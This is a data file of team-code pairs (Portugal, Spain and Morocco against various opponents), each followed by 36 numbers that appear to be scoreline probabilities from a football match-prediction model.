('POR', 'CRC',0.0171794307724942,0.0079873622871767,0.00267098174442844,0.000605089299225781,0.000103479370964767,0.0311498686861131,0.0215183142235858,0.00743242052945478,0.00171143750242022,0.0740150931520147,0.0511295905540384,0.0176601482136516,0.131900251398419,0.0911166298760824,0.156703861136666,0.0930858729789879,0.108250951487677,0.0314716619261672,0.00406654061504778,0.0002955650497455,1.42035413427704e-05,0.064303676035451,0.0373898524675392,0.0222104741532886,0.00724686961272956,0.00860963066733254,0.00511432826786801,0.000702291072550993,0.00125153350593088,0.00148688217529529,0.000883243873509595,4.24629227295642e-05,0.000101890027489719,0.000184560700483533,0.00022647892601857,0.000166049362222848),
('POR', 'SRB',0.0160827970517867,0.0102865546948408,0.00492268796597318,0.00160915399843973,0.000398436070273019,0.025086641459245,0.0252214825687006,0.012678524225666,0.00424889050046783,0.0570977325707662,0.0574046338201724,0.0288565923344148,0.0974667454993652,0.0979906308556223,0.110918198797289,0.0631130482576492,0.111514385935729,0.0492586660521325,0.00967056566389348,0.00106793208915551,7.93189337354331e-05,0.0634522819275694,0.0560568887949099,0.0318966694920157,0.0165078107301268,0.018786065163981,0.0106893715379613,0.00243063627825199,0.00414913512091381,0.00472176014311803,0.00268670677134127,0.000227930836735643,0.000526606823558318,0.000921585468714037,0.00110166026796769,0.000855298380442709),
('POR', 'GER',0.00171135723525433,0.00199990598905421,0.00156903395032107,0.000842486264601532,0.000342934450434621,0.004457027576712,0.00737560695375558,0.00610267459646489,0.0033662890357224,0.0154453303357598,0.0255593405844532,0.0211481359385227,0.0401430479857042,0.0664297760721338,0.0695556204389536,0.0602593048785271,0.115102477817915,0.0549648739996696,0.0116654979731436,0.00139265600183595,0.000112278146813809,0.0997186892925659,0.0952373102001977,0.0825085604146314,0.0303191084122579,0.0525337387814076,0.0455124483350143,0.0048260935392962,0.0125432153485848,0.0217335546165034,0.0188288003969346,0.000491649326032829,0.00173161561837874,0.00462344119856976,0.00844864206748185,0.0113875452894874),
('POR', 'MEX',0.00909052394983373,0.00636248454538902,0.00316540803399468,0.00107314836881419,0.000275312222688654,0.0174825746334997,0.0181837352919428,0.00945650844052075,0.00327859120435189,0.0456961128896899,0.0475288130081629,0.0247175079357198,0.0895806872129428,0.0931734334157625,0.117073408277485,0.0765018853512796,0.121768784659676,0.0484551356133559,0.00856961156660124,0.000852520807721737,5.67584397089016e-05,0.0795700897450571,0.0633262375105303,0.0413806741687742,0.0167994966035137,0.0219553386551294,0.0143467660620439,0.00222832665594997,0.00436831538946839,0.00570897128596893,0.00373054029278598,0.000187118651362098,0.000495727420343292,0.000993812507953647,0.00135766644538273,0.00120294221375828),
('POR', 'SWE',0.00806938365170675,0.00612671838315156,0.00331226010152405,0.00122230514760578,0.000341565566973883,0.0154577981303684,0.0175313888721598,0.00994157101790165,0.0037583952997941,0.0408800976652917,0.0463639700336171,0.0262917390129332,0.0810844324833326,0.0919615268199789,0.107219006584814,0.0708885480292253,0.121601930823006,0.0521488660403467,0.00993955061545977,0.00106564157747895,7.67293581764254e-05,0.0803979125359111,0.0689571282689788,0.0455914567291402,0.0197147968528016,0.026069133973569,0.0172357785678961,0.00281822361736955,0.00558986097578602,0.00739154634761973,0.00488696925072704,0.000256122113546374,0.000687267216901704,0.00139650795691753,0.00193695661528297,0.00178216368935438),
('POR', 'KOR',0.028599901802449,0.0142987989526116,0.00554730025362156,0.00146671833821359,0.000293474627144742,0.0390270176660177,0.0316618580149871,0.0128433238422173,0.00347317935327712,0.0790982843182558,0.064170894859188,0.0260302975122721,0.120234755746007,0.097544111555608,0.121843321161774,0.061736703416659,0.0988491092942952,0.0395678173093013,0.00703929084012538,0.000704430661888608,4.71894966997763e-05,0.0500857829983165,0.0400971769117411,0.0203168092862368,0.0107001994048591,0.0108433524440754,0.00549421033093285,0.0014277098304921,0.00217021575404476,0.00219925007099455,0.00111433641234866,0.000120637769477469,0.000247840456523748,0.000385318526500577,0.000408272865277686,0.000269408126850538),
('POR', 'BEL',0.00554095027350967,0.0054286185187278,0.00384258138233734,0.00186956385341311,0.000690814176448514,0.0100881774617491,0.0151963670314455,0.0114455545528421,0.00574701917245564,0.0272669842669674,0.0410737323300064,0.0309357916335617,0.0552742381243366,0.0832625727596293,0.0746994086404376,0.0504756088964912,0.112523757144059,0.0627114570711758,0.0155334183950942,0.00216426140927164,0.000205502751913743,0.0760341381617394,0.084750308953322,0.0572671661856897,0.0314885525604508,0.0425546571970456,0.0287548760090123,0.00584970694855153,0.0118582272122969,0.0160255951115953,0.0108287560224207,0.000703157648663641,0.00193697149922411,0.00405226152338035,0.00582713633864904,0.00608421286983678),
('POR', 'TUN',0.0273184014827874,0.0133831425218864,0.00503715215127074,0.00129072439742821,0.000250178320258614,0.038650712193307,0.0303549941287441,0.0119199054334069,0.00312050014875627,0.0797123505433803,0.0626034501157706,0.024583342102457,0.123297705305629,0.0968339497063164,0.127143192826065,0.0655543079327197,0.0998540687282162,0.0380250945971876,0.00643564859773538,0.000612684465039718,3.89600977056772e-05,0.0514841905747904,0.0392110455147201,0.0202169923131653,0.00995455157005228,0.0102650204773144,0.0052925862434972,0.00126358651828896,0.00195449409154447,0.00201545210061016,0.00103915565348269,0.000101304899079386,0.000211638693165764,0.00033444707125666,0.000359816609417901,0.000239137822655625),
('POR', 'PAN',0.0545133822472797,0.0196511261896881,0.00580949193612547,0.00116732350956835,0.000177302520025436,0.0622973768804003,0.0382999674938722,0.0117732686630436,0.00241270622547972,0.109274026212107,0.0671808647719317,0.0206511499024666,0.14375580565208,0.0883800082642369,0.126078949560958,0.0552878593330207,0.0775124076109447,0.0271676883773688,0.0042320581784902,0.000370828494855972,2.16293025212665e-05,0.0339905678424588,0.0238270280430135,0.0104485751138746,0.0055674980972553,0.00488289365845465,0.00214123561995744,0.000650459532909105,0.000855714184228198,0.000750491745237853,0.000329103963713167,4.78003136649683e-05,8.48443464011162e-05,0.000113837583355276,0.000103812774217925,5.64465172979058e-05),
('POR', 'ENG',0.00161650675162393,0.00153088248059173,0.000932758268472279,0.000385938682200153,0.000120664985797459,0.00511316683313471,0.00646725139751693,0.00408996440010964,0.00172436044990064,0.0193352599484716,0.0244556829463835,0.0154660560542737,0.054836702401187,0.0693587265608303,0.103681527539158,0.0980170094310817,0.131138788495823,0.043863258907741,0.0065206081928784,0.000545252721717178,3.02948552042696e-05,0.12397417528326,0.0829336828667822,0.0784026988089817,0.01849308733891,0.0349654785983584,0.0330551808685806,0.00206185392655181,0.00584762089914276,0.0110562860410057,0.0104522388787598,0.000144281652237005,0.000551795292829623,0.00159462522630591,0.00312940099641603,0.00410582571582995),
('POR', 'POL',0.0174733178695328,0.0128712374551839,0.00740471264059197,0.00293070701681642,0.000881263203470804,0.0230881676481391,0.0283192799418645,0.0173678056363717,0.00710094967673405,0.0493299721875236,0.060506719857237,0.0371078979526376,0.0790484825314188,0.0969585867489692,0.0844471398546679,0.0451072506470912,0.103580423976473,0.0594633017820479,0.0151718254734056,0.00217745497188397,0.000213382374927207,0.0553272515147292,0.0635243789760678,0.0339314047770667,0.0243119898050047,0.0259723898228213,0.0138730938627189,0.00465233078863574,0.0074550962177284,0.0079642459003345,0.00425408411296951,0.000577377410212076,0.00125800019033968,0.00208243120630372,0.00237157524177841,0.00186684513438044),
('POR', 'SEN',0.0187151232389464,0.0097474523399593,0.00374313952178017,0.000976998128550288,0.000192764189987467,0.0308577056314564,0.024643805698419,0.00984060782993416,0.00261965930770112,0.0702233001688047,0.0560822436227284,0.0223944050065896,0.119856089079361,0.0957203431234091,0.136379065589033,0.0775899233564286,0.108916043008783,0.0382224389183784,0.00596159429679594,0.000523032850741421,3.05467558795203e-05,0.0619654299055156,0.0434916619110674,0.0247436415534056,0.0101751608849793,0.0115778759708464,0.00658698243259154,0.00119027296826368,0.00203154028036326,0.00231160191585237,0.0013151359756492,8.75846732881739e-05,0.00020169598121285,0.000351108452798948,0.00041543027846304,0.000302707042761135),
('POR', 'COL',0.00251602919552018,0.00219423766940395,0.00125542875828498,0.000488014830420653,0.000143375358932549,0.00711819640843421,0.00846272169899668,0.00503060427426608,0.00199360444266723,0.0246479741022135,0.029303623179596,0.017419328823756,0.064010873592594,0.0761016102733443,0.110824306048993,0.095937034771714,0.131757429236681,0.0452380569202701,0.00690319680062445,0.000592541937877185,3.38286399985709e-05,0.114058165764855,0.0783222597007933,0.0678010593541855,0.0179276258550551,0.0310387373735569,0.0268692359360284,0.00205177793660865,0.00532847436449291,0.00922537751169047,0.00798611238521963,0.000147559060270539,0.000516910965684768,0.00136856730566773,0.00246177930788467,0.00292340001110729),
('POR', 'JPN',0.0328623186330125,0.0190117339430381,0.00897968707715791,0.00291143945435327,0.000716499528732472,0.0372699247896848,0.0373595846125088,0.0187247300644607,0.00625659197630241,0.0701250794178791,0.0702937785025058,0.0352314417122751,0.0989576741390061,0.099195735460043,0.0930967099768207,0.0437914365101877,0.0933206716448177,0.0497171847412099,0.0117720658600552,0.00156791084663865,0.000141917606570497,0.0438967850575988,0.0467725860473919,0.02200119352039,0.0166122629306462,0.0156283687704768,0.00735137384490317,0.00295009644535478,0.00416305671439464,0.00391649143867951,0.00184226473977791,0.00033784250608288,0.00064729838706745,0.000941361311280068,0.000939756312440745,0.000618513500351691),
('ESP', 'MAR',0.0199399490093339,0.0104585866991893,0.00408107767753191,0.00108318465427291,0.000217387340489475,0.0317678217748958,0.0258182619232674,0.0104914755166689,0.00284220161279632,0.0709058014298666,0.0576263794907761,0.0234169810244622,0.118696350477782,0.0964665908694141,0.132465170527971,0.0739155893688947,0.107656750677948,0.0392000390766386,0.0063437960779495,0.000577476685353801,3.5045918486927e-05,0.0600724865576675,0.0437472579408581,0.0244109779278832,0.0106195181133755,0.0118513860969674,0.00661307560851022,0.0012889283839546,0.00215766682157822,0.00240795696171301,0.0013436404248041,9.85843904273965e-05,0.000222766720129506,0.000380624359382163,0.000442352641453501,0.000318155895336704),
('ESP', 'IRN',0.00933371370473771,0.00405771559133479,0.0011873029108712,0.000234337920967509,3.48530390230494e-05,0.0222892968467857,0.0133551581459822,0.00400102906633227,0.000799103657910213,0.0630071353029988,0.0377522118387596,0.0113100642638703,0.133580899603263,0.0800381479840813,0.188802497293961,0.133426197496447,0.113125471254193,0.0239783724759599,0.00225889729232669,0.00011970045308947,4.15680759516608e-06,0.0799454545664179,0.0338908977103148,0.0239506027517624,0.00478906922159358,0.00676884368525713,0.00478352292642363,0.000338367903459732,0.000717370956855258,0.00101392810306484,0.000716540158449771,1.47579724190858e-05,4.20159953364291e-05,9.0140436752908e-05,0.00013044449956161,0.00010931082919085),
('ESP', 'FRA',0.0072432437261691,0.00555080143057039,0.00299961068016359,0.00110571879321009,0.000308563160746049,0.0144740093655732,0.0163862742611659,0.00927559107432961,0.00350035191676986,0.0393271566327375,0.0445229485638338,0.02520259686366,0.0801415079480957,0.0907295757362456,0.10887576331666,0.0739562565098138,0.123260119089326,0.0513582544429445,0.00951076406154165,0.000990702110764407,6.92111169126759e-05,0.083727146493452,0.0697724474901109,0.0473944693171816,0.0193811869174395,0.0263301948471662,0.0178853638748491,0.00269182478070563,0.00548544353390202,0.00745221630058196,0.00506208180317871,0.00023728984463812,0.000653905282792619,0.00136417511692034,0.0019413149601507,0.00182809295134482),
('ESP', 'AUS',0.107824357439628,0.0370775410143733,0.0120560655810844,0.00268475820340481,0.000453363626081519,0.0801602785781828,0.0550547030560333,0.0189059992202482,0.00432826245745962,0.112323620041443,0.0771447362365261,0.0264918025558977,0.118044084704395,0.0810735958780774,0.0827039224018186,0.028971967539816,0.0568016974262437,0.0278409882420694,0.00606492537619071,0.000743171083517392,6.15867151954104e-05,0.0198981727377346,0.0195059238836754,0.00683310993215406,0.00637380245195746,0.00446560676641501,0.00156434435665065,0.0010413594849147,0.00109439427966834,0.000766753368534653,0.000268600969084655,0.000109077145107417,0.000155410141821655,0.000167906252916536,0.000124239381703537,5.69199937320646e-05),
('ESP', 'PER',0.0223270205273504,0.0113996896942507,0.00437668143151083,0.00114320812494803,0.000225814698657108,0.0341694915468861,0.0273361730114132,0.0109347011190457,0.0029159821435853,0.0741925653660844,0.059355311161857,0.0237426280230186,0.120821305199572,0.0966590942059615,0.131170265898379,0.0712028339183687,0.104938438361923,0.0386644577182982,0.00633150175785988,0.000583208798014026,3.58320800021383e-05,0.0569634752751487,0.0419762656209391,0.0227858733764906,0.0103107407390945,0.0111939082442643,0.00607636177417907,0.00126632720915259,0.00206219188492285,0.00223882913226273,0.0012152981301388,9.80648313519836e-05,0.000215599355883579,0.000358449658897342,0.000405450035759984,0.000283406629756835),
('ESP', 'DEN',0.0290344980167587,0.0144804554198799,0.00561430681559612,0.00148363494686108,0.000296709103037851,0.039362107239088,0.0319191144136903,0.0129417596822982,0.00349819946973051,0.0794554598335483,0.0644312027761795,0.0261239435268634,0.120290246257918,0.0975445270202565,0.1214075858777,0.0612676520631899,0.0984505885516209,0.0395499013743987,0.0070613863675697,0.000709180967103795,4.76862074264568e-05,0.0496825331068947,0.0399172684148597,0.0201440239081782,0.0106904661662862,0.0107897666646485,0.00544499476761373,0.00143153666809984,0.00216725066715001,0.00218738160138398,0.0011038497628807,0.000121419594403637,0.000248452212629926,0.000384742235445367,0.000406082102885133,0.000266975317756494),
('ESP', 'ARG',0.00887325490608623,0.00646870797786132,0.0033673609348103,0.00119587035537073,0.000321528578274122,0.0167670166661322,0.0182900946850611,0.00997576283991578,0.0036273128871781,0.043667235042686,0.0476338682944594,0.0259804107871256,0.0852936804848296,0.0930415662588323,0.111067438756414,0.0723147124252886,0.121156554665169,0.0507466262605256,0.00944680425693814,0.00098920245443601,6.94861639709456e-05,0.0788836179815523,0.066081071566469,0.0430246140596102,0.0184521118203697,0.024027909077038,0.0156442910230217,0.00257623266814725,0.00503206502167433,0.00655263755106117,0.00426634579349,0.000228359794938215,0.000603231801145056,0.0012063959257377,0.00164595441277331,0.00147539496106908),
('ESP', 'ICE',0.0830516976334881,0.0318117517003479,0.0110112120890314,0.00260936571096585,0.000468827340056102,0.069851081189797,0.0510325691397367,0.0186419670865626,0.00453988427017916,0.105512377166673,0.0770863899475722,0.0281593101905115,0.119534961510965,0.0873311634411057,0.0902807639389194,0.0340930228042413,0.0659583108696982,0.0319016796909141,0.00685764591254685,0.000829199612797701,6.7757503110309e-05,0.0249080545899152,0.0240942731484147,0.0090987998778597,0.00776902636661507,0.00586768612775497,0.00221583367523369,0.00125253354424455,0.00141899512666611,0.00107171962446542,0.000404717018360331,0.000129347343441431,0.000198620521662605,0.000231243150871997,0.000184317222835838,9.15541013589265e-05),
('ESP', 'CRO',0.0199623883354643,0.0109215664701414,0.00447522712206017,0.00124883117615613,0.000263643330876314,0.0310090937427909,0.0265304654747575,0.0113493416503173,0.00323672059248721,0.0686272097151443,0.0587154153255404,0.0251175882799292,0.113910792242549,0.097458712139752,0.126049795148642,0.0697412007423463,0.107844484783396,0.0416913989664587,0.00716328908972345,0.000692310654438123,4.47211290201247e-05,0.0596685131726274,0.0461342792524223,0.0255253094751364,0.0118899768569892,0.013157042608872,0.00727956716374582,0.00153217468605317,0.00254317832630432,0.00281419434231082,0.00155704570819517,0.000124801516279482,0.000279840054010937,0.000474705536525184,0.000548399715907707,0.000396682647386852),
('ESP', 'NGA',0.0471322792463125,0.017969594469259,0.00552105243388719,0.001152963486779,0.000182004873406618,0.0569076034340944,0.0363619833765147,0.0116170226409656,0.00247429141663875,0.103648636875585,0.0662278814013528,0.0211586587490609,0.141585297190671,0.0904680905912412,0.128938157380262,0.058710363146777,0.0823870072246023,0.028902984905993,0.00450654951345074,0.000395246583633885,2.30757603546533e-05,0.0375138842605562,0.0263212190143556,0.0119850349826329,0.00615600138506693,0.00560611512049834,0.00255267378760819,0.00071988218008211,0.000983367803780573,0.000895528244544989,0.000407767487248739,5.29533684562969e-05,9.75970527796804e-05,0.000135973286796924,0.000128759883415132,7.30095980162421e-05),
('ESP', 'BRA',0.00256393418305742,0.00244914913353998,0.00156000928010717,0.00067708256981495,0.000222372737538896,0.0067496706914061,0.00898708736717649,0.00598308740070084,0.0026554643257887,0.0226438742105064,0.0301499858534256,0.0200721316173889,0.0569744506106883,0.0758606439847615,0.0955692767710698,0.0801542319815885,0.12724908802633,0.0505036665040096,0.00890858279059538,0.000883927934686835,5.86888393167835e-05,0.106724182349317,0.0847151456546039,0.0710508404643353,0.0224149633360224,0.0375989906337392,0.0315343834268986,0.00296541177774582,0.00746129859673664,0.0125156259168798,0.0104968920664684,0.000248328222127995,0.000844365941811808,0.00217250503739304,0.00380884568815877,0.00456982217254807),
('ESP', 'SWI',0.0218022245156336,0.0118046822934199,0.0048354139046116,0.00134957082630594,0.000285019746972168,0.0326108437068474,0.027920633922139,0.0119524935573871,0.00341114753191188,0.0704975610722446,0.0603583462236055,0.0258386950090034,0.114300311312353,0.0978612261009564,0.123546223608242,0.0667700253507889,0.105777357765943,0.0418932348653519,0.00737416006832417,0.000730135981370835,4.83708956382704e-05,0.057166918205182,0.0452820373183707,0.0244724823744534,0.0119559993091509,0.0129231368414366,0.00698425374174584,0.0015783954073818,0.00255911103439234,0.00276612111081088,0.00149493826114709,0.000131883436710182,0.000288952391123358,0.000479048596043836,0.000541147336749631,0.000383450354866858),
('ESP', 'CRC',0.0461831260914229,0.0156991404551113,0.0042238192296488,0.000770209961251412,0.000106042037283645,0.0593985897886327,0.0330432740533924,0.00919094177195892,0.00170429864221979,0.110569037880964,0.0615092552453127,0.0171087157550657,0.154366191791246,0.0858734929244534,0.143674465744411,0.0668616355285141,0.0799257147848289,0.023885595354385,0.0031725106909548,0.000237024175591077,1.1719136110703e-05,0.0371949461138475,0.0222312289479118,0.0103457237134292,0.00442916392477733,0.00412239074633239,0.00191843266066307,0.000441214768614751,0.000615982963209273,0.000573318691870266,0.000266804718701418,2.74525319591887e-05,5.16199782347033e-05,7.3285550079748e-05,7.05169056687203e-05,3.96602647726842e-05),
('ESP', 'SRB',0.0452994968374815,0.0210904384323029,0.0081166256364158,0.00213510680798586,0.000425550081005098,0.0498282521874554,0.0403421143240746,0.0163309580076585,0.0044073080768724,0.0888475219770149,0.0719330245725504,0.0291193266228278,0.118816361425228,0.0961964954771956,0.105929255186825,0.0472199576297285,0.0857627939052384,0.0389414624008562,0.00785856184050498,0.000892064835174803,6.82025213291472e-05,0.0382303782583017,0.0347177784147546,0.0154761026389895,0.0105093051910384,0.00936944085868436,0.0041766044666417,0.00159061870663144,0.00212714460607852,0.00189642942347103,0.000845369080204861,0.000153583073306639,0.00027810254168058,0.000381551833216944,0.000357813163334711,0.000210919188770998),
('ESP', 'GER',0.0062239117997511,0.00549937579542332,0.00346932740051532,0.00149899113344774,0.000491136105091931,0.0118690562303306,0.0158169792339302,0.0105390364335484,0.00468152134930177,0.0322226603660635,0.0429406635187718,0.0286118613808554,0.0656096715432204,0.0874329678961499,0.0890600786549343,0.0604461005783124,0.118683523552406,0.0582575990347196,0.012709609720235,0.00155967594491386,0.000129451515655196,0.0805518736338978,0.0790802061684133,0.0536726462406369,0.0258784752628733,0.0351280381104029,0.0238418038340971,0.00423428007069762,0.008621563877856,0.0117031092982165,0.00794303499842896,0.000444216242248042,0.00122626464865614,0.0025669830603577,0.00368030394033643,0.00366903406442709),
('ESP', 'MEX',0.027034889466121,0.0139786331972973,0.00559351053562174,0.00152614002125667,0.000315173008405489,0.0372258209715643,0.0311800571729322,0.0130580862951277,0.0036457837295442,0.0762274652311044,0.0638475300751348,0.026739096494526,0.117068468281689,0.0980556355482113,0.119860789670935,0.0613598568060672,0.100394462155377,0.041065317603833,0.00746548619293697,0.000763420000959601,5.23116142622193e-05,0.0513945372701799,0.0420448090619893,0.0215238316931236,0.011465329864184,0.011738801331646,0.0060093978252784,0.00156325824551539,0.00240081770758569,0.00245808209939818,0.00125835618178981,0.000135141533536705,0.000280591191119279,0.000440964814276957,0.000472524152260547,0.000317305772911592),
('ESP', 'SWE',0.0245400313422423,0.0137812397324885,0.00599183378261119,0.00177939719135823,0.000400260689078266,0.0336883281697594,0.0307682690106226,0.0140506583339425,0.00427758869695765,0.0697970518339074,0.0637471368763791,0.0291108102216552,0.108456594079627,0.0990557217859617,0.112352718730341,0.0581944026235571,0.102614135570938,0.0452348522549676,0.00886250806217499,0.000976703259668849,7.23878489701541e-05,0.0531501897574537,0.0468598398773206,0.024271601252848,0.0137713186183573,0.0142660305756811,0.00738925712295174,0.0020235794337413,0.00314440979191249,0.00325736753879896,0.0016871915534215,0.000189349504109633,0.000398212939154038,0.000634341985719714,0.000690197244433262,0.000479674222546745),
('ESP', 'KOR',0.0741434035216703,0.0265814084457578,0.00829418471911852,0.00176488712582302,0.000284268457084117,0.0703128753196698,0.0459368068359444,0.0150057170375207,0.00326784495657698,0.111642584812454,0.0729383321316197,0.0238260351239602,0.132949335597564,0.0868584582915495,0.105548289752974,0.0418973190791254,0.0689568073585847,0.0283731834494518,0.0051886749910302,0.000533737106673612,3.67999247309676e-05,0.0273723559836174,0.0225254302661734,0.00894145363667405,0.00617892262032445,0.00490543794115176,0.00194721012651455,0.000847466270273447,0.00100920341251031,0.000801205163790831,0.000318037823954808,7.37207340870332e-05,0.000118696767746755,0.000144662724384076,0.000120232507365231,6.06568566140949e-05),
('ESP', 'BEL',0.0182619338071534,0.0132640842029575,0.00754766130555131,0.0029545800972231,0.000878691354084324,0.0238523510902579,0.0289343124833274,0.0175495160983266,0.00709620029766599,0.0505066907343721,0.0612676027900652,0.0371606127531004,0.080209885787089,0.0972993350145486,0.0849211023256831,0.0449545186945644,0.103014319293812,0.059014923792581,0.0150260069737847,0.00215202765630942,0.000210421732596533,0.0545324897543275,0.0624812307479791,0.0330755675420612,0.0238628642201469,0.0252644759974109,0.0133742064979118,0.00455685877160467,0.00723676638290543,0.0076618258769382,0.00405592585572393,0.000564255832196467,0.00121835871732238,0.00199862591290394,0.00225546495889236,0.00175465454471103),
('ESP', 'TUN',0.0709581991620532,0.0249836852271818,0.00756351074113228,0.0015597817417804,0.000243375158152676,0.0699404429305642,0.0442339725331398,0.0139879320467351,0.00294889850099549,0.113002960038752,0.0714689473082141,0.0226003390866605,0.136934387771149,0.0866044264764635,0.110622627630457,0.0446833185697608,0.0699635013322318,0.0273865710702707,0.00476454316706514,0.00046625918363697,3.05137560710139e-05,0.0282600538899446,0.0221242779326167,0.00893656370459288,0.00577356381963394,0.00466418122515323,0.00188398250895677,0.000753336205613369,0.000912875486324709,0.000737467678063753,0.000297882123211759,6.21734922790315e-05,0.000101793925744766,0.000126098660935194,0.000106407578924195,5.41091675725077e-05),
('ESP', 'PAN',0.127730368913389,0.0322853704874154,0.00767781205334398,0.00124166340833966,0.000151822726371599,0.0992400636296025,0.0491326956420203,0.0121625364432521,0.00200718063332316,0.136372733278612,0.0675166838168954,0.0167133945475652,0.140549504668485,0.0695845587250663,0.0965694670659147,0.0331757197984841,0.047810511804694,0.0172252859388693,0.0027582077150999,0.000248433423832991,1.49115267219484e-05,0.016424944563192,0.0118352368946313,0.00406590731930792,0.00284268503541744,0.00195316646297699,0.000670995763612245,0.000341389795680894,0.000351845750453623,0.000241747964113116,8.30507091210979e-05,2.58226532655926e-05,3.59196451954273e-05,3.77771951749304e-05,2.70185529427391e-05,1.13071667614243e-05),
('ESP', 'ENG',0.00555599128759401,0.00400177375905852,0.00196147357546811,0.000653215157678852,0.000164412663467914,0.0129618288546246,0.0132023419214398,0.0067236589128555,0.00228280656292788,0.0383989776148778,0.0391114894040942,0.0199186110988263,0.0853167499589661,0.0868998439354015,0.126373986595249,0.0935946604603271,0.128718917655718,0.0442561564969901,0.00676273688629125,0.00058129128848835,3.3234194531809e-05,0.095331355110235,0.0655536800288077,0.0485501374889114,0.015025783700617,0.022256686862523,0.0164836696696247,0.00172205569327695,0.00382614861448287,0.00566741764015441,0.00419738305333372,0.000124026173645048,0.000371716992623397,0.000842008941175214,0.0012958801993096,0.00127612264022693),
('ESP', 'POL',0.0501939556364019,0.0267256350053529,0.0123593239775573,0.00393561842585459,0.000952485761884599,0.046382783970932,0.0458146596562129,0.0226267470353876,0.00744986699665093,0.0776374999409872,0.0766865490132007,0.0378736229529808,0.0974647414576967,0.0962709345166422,0.0815703393732513,0.0341339861264361,0.0805712166559328,0.0475458750215344,0.012469907991623,0.00183965413303735,0.000185653997606026,0.0337158924758077,0.0397921658981478,0.0166514599441966,0.0156545014886958,0.0131015891496129,0.00548250093972027,0.00307929225927088,0.00386568892803926,0.00323527824581001,0.00135383699033441,0.000393695892148878,0.0006723846141038,0.000872774179652485,0.000780077221822179,0.000462863519305769),
('ESP', 'SEN',0.050606245098258,0.0191785665100506,0.00592435992500018,0.0012445494843052,0.000197675949887614,0.0588688786849404,0.0378603671320875,0.0121745770549485,0.00260994698316523,0.104953443848732,0.0674987532403334,0.0217052510233301,0.140335933286514,0.0902543088086838,0.125097843063838,0.0557571748472792,0.0804542293250909,0.0290226461169516,0.00465310245863189,0.000419634079947226,2.5220295093475e-05,0.0358591357118206,0.0258712814616284,0.0115310506452383,0.00622178227091849,0.00554620277128641,0.00247198984477514,0.000748137943691157,0.00100035437337601,0.00089173294022509,0.000397452971589896,5.666355662396e-05,0.000102261500657348,0.000139537656263103,0.000129484006159677,7.2131797246022e-05),
('ESP', 'COL',0.00834316640982185,0.00550195963680819,0.00253230773307173,0.000792274699233305,0.000187382730484694,0.0173074241361325,0.0165701882302823,0.00793217800139792,0.00253143162775,0.0469501544174934,0.0449502415853162,0.0215177590323904,0.0955218833759563,0.0914529842916515,0.129561948082966,0.0878662448738868,0.124043060962194,0.043778703058708,0.00686705918138709,0.000605900367292911,3.55958476176866e-05,0.0841234492895333,0.0593796295923917,0.0402700418717441,0.0139712943311608,0.0189500881558343,0.0128515595120261,0.00164363660255078,0.00334404147993196,0.00453572012294814,0.00307603197465949,0.000121665981863512,0.000334006556240906,0.00069316286470422,0.000977858035545306,0.000874357865745109),
('ESP', 'JPN',0.0857136007259066,0.0352152448561921,0.0133722570093765,0.00348847048272524,0.000690992952619552,0.0668192838204767,0.0539386723058572,0.0217705144665668,0.00585795286730393,0.0984940493213027,0.0795075604924491,0.0320905284076549,0.108887852394951,0.0878977722089854,0.0802523230651002,0.0295737091681489,0.0647822530876288,0.0354769526139582,0.00863483512011674,0.00118218193172191,0.000110179052441029,0.0238728480235621,0.0261471578318376,0.0096354648907195,0.00954604525342278,0.0070356085717719,0.00259268559183929,0.00174257907047619,0.00192646859297624,0.00141984231021042,0.000523224773353083,0.000205551305098765,0.000308694074860539,0.000352001550524981,0.000275751062492052,0.000137942662765669),
('MAR', 'IRN',0.000963578644184033,0.000630003520444778,0.0002479415493868,6.56763540610966e-05,1.30978588347333e-05,0.0043126502014478,0.00346025473335924,0.0013881676301634,0.00037126541597372,0.0200748599311826,0.0161070631406829,0.00646175076457087,0.0700845157441665,0.0562323086758878,0.163117430256294,0.189822928580566,0.130877264274356,0.0225589954174972,0.00172819516418526,7.44711982741132e-05,2.09372134594564e-06,0.152304419890236,0.0525046841316293,0.0611007228988569,0.00603340305280025,0.01404237713885,0.0163413876036491,0.000346654331890462,0.00121022518037212,0.00281672519753683,0.00327787793838472,1.22296053125278e-05,5.72576219994541e-05,0.000201829999086838,0.000478841210000613,0.000676808922714561),
('MAR', 'FRA',0.000621746858373215,0.000726108714098152,0.00053001841360052,0.000262788056901031,9.8463814289748e-05,0.00239054007664447,0.00362408662187475,0.00274707878173023,0.00138820115161019,0.0106958339269675,0.0162150089108428,0.0122910712607361,0.0358917419470277,0.0544122991690589,0.0802940128395249,0.089813535762475,0.121726659423681,0.0412448399026277,0.0062111357679848,0.000526132281902949,2.96274230201762e-05,0.136158367140591,0.092269517305498,0.103208835867577,0.0208425526896405,0.0466272212627747,0.0521552660814035,0.00235403855632047,0.00789938820794342,0.017671852737856,0.019766997833733,0.000166969761530303,0.000755662666712785,0.00258448771532264,0.00600407812396088,0.00978930147226451),
('MAR', 'AUS',0.0162441485197603,0.00966203972873825,0.00425019310655214,0.00127406374678141,0.000289011914977006,0.0264993385827475,0.0243714523959924,0.0112072173053562,0.00343576076054539,0.0611451242275942,0.0562351954448421,0.0258597659802647,0.105815647203796,0.0973186934657089,0.122080611055549,0.070422834380025,0.112277587288576,0.0447520208406988,0.00792774573840174,0.000789967639741074,5.26844961618439e-05,0.0647679092187246,0.0516308711856291,0.0297835361321015,0.0137194838799189,0.0158283110266434,0.00913064340280566,0.00182278773928324,0.00315445371620253,0.00363932601081928,0.00209936410621525,0.00015333063383704,0.000358605977845435,0.000634670354165004,0.000765458327799355,0.000585967570380752),
('MAR', 'PER',0.00241609086549314,0.00193599454919557,0.00100299673218132,0.000352198664901954,9.33788645583032e-05,0.00730410022370803,0.00782486930124407,0.00419138413399729,0.00149674073626859,0.026115811118582,0.02797782101012,0.0149862944122261,0.0700328140522702,0.0750260264746401,0.125201167007219,0.111914196452751,0.134127782778064,0.0401876229361008,0.00535159666005156,0.000400863907957298,1.98729297806749e-05,0.119893475359784,0.0718454250187707,0.0642208311789817,0.014350975815929,0.0256559577701054,0.022933219926788,0.00143328894508991,0.0038435435805107,0.00687129523831329,0.00614207921193823,8.94202255830409e-05,0.00032296990069897,0.000880767001282123,0.00162799407330739,0.0019286174590887),
